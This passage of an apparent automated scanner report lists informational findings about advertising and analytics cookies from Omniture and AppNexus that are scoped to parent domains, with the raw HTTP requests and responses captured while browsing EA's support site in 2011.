X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:21 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04961D-7167-1669492C"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.21. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A41%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=http%3A//support.ea.com/app/answers/detail/a_id/4394&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:42 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:42 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04957E-289C-64EC62A2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.22. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A15%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:15 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:15 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049617-7405-11B63051"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www414
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.23. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A18%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/ea&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/ea&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:19 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:19 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0495A3-354B-1AB15A04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.24. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707?[AQB]&ndh=1&t=24/5/2011%208%3A44%3A5%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v1=Not%20Logged%20In&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B795-6000018160001985|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:44:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:44:06 GMT
Last-Modified: Sat, 25 Jun 2011 13:44:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0494A6-6F1B-46C49248"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www411
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.25. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=116889&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; anj=Kfw)(>Mwz%)_`z[:mPWhOPI9XDFhV./:U50e293-Kvq%pSv/-CrYm4qjBD$l#D6X7kL*Gon#lKeGg(I/0xY%G_wf%/9SAjDR9%mEtufj#5kI+687EEs4`p7@]!Cu'2i*kgqP*gC83(V[bMK+Z!X*h/E@nqY28_[/LHgJALhZ6F`O-W9Y:$uaZey2a9vrW$d=[>)H_]kQ1p:.C_!ftDA7#p2M6-mZ$6Md!-m>]T('5Q5PH9V)4w#p!vR:d^f1l#p?2ndxaH]IB$9^TI>*#bjKq!@wcDPY-fh64Xm$p+Qrw+yDMpTOqtfut3ihD%Pg0DN5X/5YdqnfTjetzaJ>he-w13KS+'9vyjtH)ZY7uy(3p(IUn=TzS*)ESmgwx<wc-[7:cJ%W=+YWoRa6y.'c)1WpOx7Fkso#ovB=o$Y?/srqMUWroyCiVTS(oHlhJU2?5](tdx?e$N0Yk6@uGdmIh3Rs!a6GbEZ4E4)mud^if]1EnJMfnTtvAWfI6j$zZ]h:8FX05B)eJ9Ys>ZX'E9FcQ`_svd*?j7027EQ6:tWVY8iN3/zjKA6]cD28dvlu'pOcY1GietF(FXHVvj5/I*OT3]^H?R$jt41wt7LLYkBjeX8VW56p^!8UJJr4##]ewVu0nM9O%`cMeJ<z>D; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(ByG5K)WgR>?.+UI.b6+F*gFFRYp*xrtU*ZxoKfg>?3=*ijt$+z9$J(!=3[xo+Vdv$CJ[J3)]jfIENCh2k'(YvU>7%w:Ah%lXv2u*lS*i_#:w([I.`GFZV<KPlrE>cBm`g/i@>eoX9SESC@d]ks)brLQUy-Mn:b/AwSLhdgiWVNoZ22VUco)=>ej%`5dFNks^zkSswXXS?5KKvZ0`#34WA:0qW*$^?3?U>lz!8huyZz#@DDavDi9'PZF4^fvCe)YAwg%LO$S<wKCPLGuv#J6FCl3(ahmE/YEN9NG(:KuQ^V6fBc8]!n:lvwN-:Ogsvvq>U`94GCv1UXjSzUSAICm9p^8nEUsig`G'8><fIqzl21[1Ejk?%.m1%Fm.BG7w8FmN^1U?0.h!<k$a_YXcCHD<^=$BsLp$pb?L2+fc.tSY10Jf$PmV(#pIcaA6A2(i')atPd0[!WH-bV<9saxr.g`axSdN%IbK@@feSUTJuWJC!GZYetN(4=%ju`+=fs(K<64Ev(uRdtY_iI!aq>'WzyLmv^Z(]$=ZWPtUvV6L1XnM6U`Z(.jD)EHCsXbooUIwVdPrtYVS(v=M(<nOFD]))e-oIbcz7U4fbFEUz%S7nI_O#q@kKOkupw/iy_vEG4k2yQA@wd6VLq%qxQhzNvWvJ4Hqc^1ts; path=/; expires=Thu, 22-Sep-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Location: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Date: Fri, 24 Jun 2011 13:18:31 GMT
Content-Length: 0


12.26. http://id.google.com/verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

Issue detail

